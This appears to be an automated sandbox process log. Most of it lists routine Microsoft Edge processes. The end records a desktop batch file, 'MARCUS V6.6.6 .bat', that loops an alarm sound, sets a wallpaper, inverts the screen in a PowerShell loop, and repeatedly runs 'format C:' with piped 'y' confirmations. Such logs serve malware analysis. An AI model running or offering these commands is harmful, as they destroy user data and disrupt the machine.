C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=5592,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=5540 /prefetch:12⤵PID:4584
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=3464,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=3636 /prefetch:12⤵PID:524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5496,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=5396 /prefetch:82⤵PID:2464
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5212,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=5388 /prefetch:82⤵PID:5868
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6020,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=5852 /prefetch:82⤵PID:4624
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6168,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6200 /prefetch:82⤵PID:4744
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6168,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6200 /prefetch:82⤵PID:560
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6376,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6400 /prefetch:82⤵PID:3984
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3548,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6372 /prefetch:82⤵PID:6116
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6240,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=5488 /prefetch:82⤵PID:4496
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6268,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6568 /prefetch:82⤵PID:4504
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4272,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6572 /prefetch:82⤵PID:4564
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5680,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=3640 /prefetch:82⤵PID:3980
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6152,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=5788 /prefetch:82⤵PID:4008
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=1268,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6616 /prefetch:82⤵PID:5220
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=6640,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6512 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3548
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6512,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=896 /prefetch:82⤵PID:2860
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4808,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=3200 /prefetch:82⤵PID:3940
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4936,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=3200 /prefetch:82⤵PID:1524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4952,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6612 /prefetch:82⤵PID:5116
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --always-read-main-dll --field-trial-handle=896,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6080 /prefetch:12⤵PID:2600
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --always-read-main-dll --field-trial-handle=6380,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6796 /prefetch:12⤵PID:2000
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --always-read-main-dll --field-trial-handle=6932,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6432 /prefetch:12⤵PID:5532
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6388,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7104 /prefetch:82⤵PID:2624
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --always-read-main-dll --field-trial-handle=7096,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7140 /prefetch:12⤵PID:5112
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7360,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6952 /prefetch:82⤵PID:5508
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --always-read-main-dll --field-trial-handle=6448,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7508 /prefetch:12⤵PID:3972
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --always-read-main-dll --field-trial-handle=7688,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6464 /prefetch:12⤵PID:2836
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --always-read-main-dll --field-trial-handle=7680,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7828 /prefetch:12⤵PID:3224
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --always-read-main-dll --field-trial-handle=7944,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7972 /prefetch:12⤵PID:4820
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --always-read-main-dll --field-trial-handle=6948,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7376 /prefetch:12⤵PID:1780
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --always-read-main-dll --field-trial-handle=8284,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7092 /prefetch:12⤵PID:5052
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6404,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7624 /prefetch:82⤵
- Modifies registry class
PID:2488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8108,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7644 /prefetch:82⤵PID:2524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --always-read-main-dll --field-trial-handle=6428,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6584 /prefetch:12⤵PID:3996
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6648,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7272 /prefetch:82⤵PID:5428
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window2⤵
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
PID:2760 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x264,0x268,0x26c,0x260,0x274,0x7ffdbf0cf208,0x7ffdbf0cf214,0x7ffdbf0cf2203⤵PID:3524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1812,i,6946532384449729555,16583352416098345170,262144 --variations-seed-version --mojo-platform-channel-handle=2216 /prefetch:33⤵PID:5952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2184,i,6946532384449729555,16583352416098345170,262144 --variations-seed-version --mojo-platform-channel-handle=2156 /prefetch:23⤵PID:1076
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2520,i,6946532384449729555,16583352416098345170,262144 --variations-seed-version --mojo-platform-channel-handle=2840 /prefetch:83⤵PID:10552
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4272,i,6946532384449729555,16583352416098345170,262144 --variations-seed-version --mojo-platform-channel-handle=4192 /prefetch:83⤵PID:1052
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4532,i,6946532384449729555,16583352416098345170,262144 --variations-seed-version --mojo-platform-channel-handle=4556 /prefetch:83⤵PID:5848
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4532,i,6946532384449729555,16583352416098345170,262144 --variations-seed-version --mojo-platform-channel-handle=4556 /prefetch:83⤵PID:3332
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:1480
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start1⤵PID:2836
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start2⤵PID:456
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat"1⤵PID:1604
-
C:\Windows\system32\chcp.comchcp 12502⤵PID:3516
-
-
C:\Windows\system32\mode.commode 85,302⤵PID:4272
-
-
C:\Windows\system32\wscript.exewscript.exe "C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat?.WSF//Job:Nyan"2⤵PID:668
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c "(New-Object Media.SoundPlayer 'C:\Windows\Media\alarm.mp3').PlayLooping()"2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4276
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\magnus\matrix.bmp" /f2⤵
- Sets desktop wallpaper using registry
PID:4676
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class Inverter { [DllImport(\"user32.dll\")] public static extern int InvertRect(IntPtr hDC, ref System.Drawing.Rectangle lprc); }'; $rect = [System.Drawing.Rectangle]::FromLTRB(0,0,[System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width,[System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height); while($true) { [Inverter]::InvertRect([IntPtr]::Zero, [ref]$rect); Start-Sleep -Milliseconds 50 }"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4680 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zceahbm0\zceahbm0.cmdline"3⤵PID:1960
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat"1⤵PID:1356
-
C:\Windows\system32\chcp.comchcp 12502⤵PID:3948
-
-
C:\Windows\system32\mode.commode 85,302⤵PID:952
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:1516
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:712
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:4004
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:3428
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:5532
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:3700
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:4196
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:4960
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:188
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:2428
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:4412
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:5564
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:5828
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:2864
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:4984
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:5952
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:2300
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:1848
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:3556
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:720
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:2128
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:3672
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:1164
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:4988
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:5796
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:2776
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:764
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:3496
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:3696
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:4756
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:1312
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:4496
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:4192
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:2244
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:420
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:4272
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:956
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:2492
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:3540
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:564
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:1300
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:2324
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:3452
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:1740
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:5040
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:5844
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:544
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:5308
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:2940
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:6052
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:4832
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:3952
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:5736
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:2696
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"2⤵PID:3764
-
-
C:\Windows\system32\format.comformat C: /fs:NULL /p:3 /q2⤵PID:4432
-
-
